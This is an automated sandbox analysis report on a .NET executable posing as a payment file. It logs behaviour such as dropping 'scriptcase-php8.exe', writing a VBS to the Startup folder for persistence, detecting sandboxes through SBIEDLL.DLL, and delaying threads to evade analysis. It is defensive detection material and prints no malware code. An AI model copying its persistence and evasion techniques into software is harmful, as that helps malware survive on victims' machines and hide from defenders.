Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static file information: File size 1845544 > 1048576

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x195e00

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdbeA source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb2 source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.65b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 8140, type: MEMORYSTR

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Code function: 3_2_026E0006 pushad ; retf

3_2_026E001D

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File created: C:\Users\user\AppData\Local\scriptcase-php8.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: 4870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Window / User API: threadDelayed 1657			Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Window / User API: threadDelayed 5773			Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7780	Thread sleep count: 1657 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99869s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7780	Thread sleep count: 5773 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99765s >= -30000s	Jump to behavior
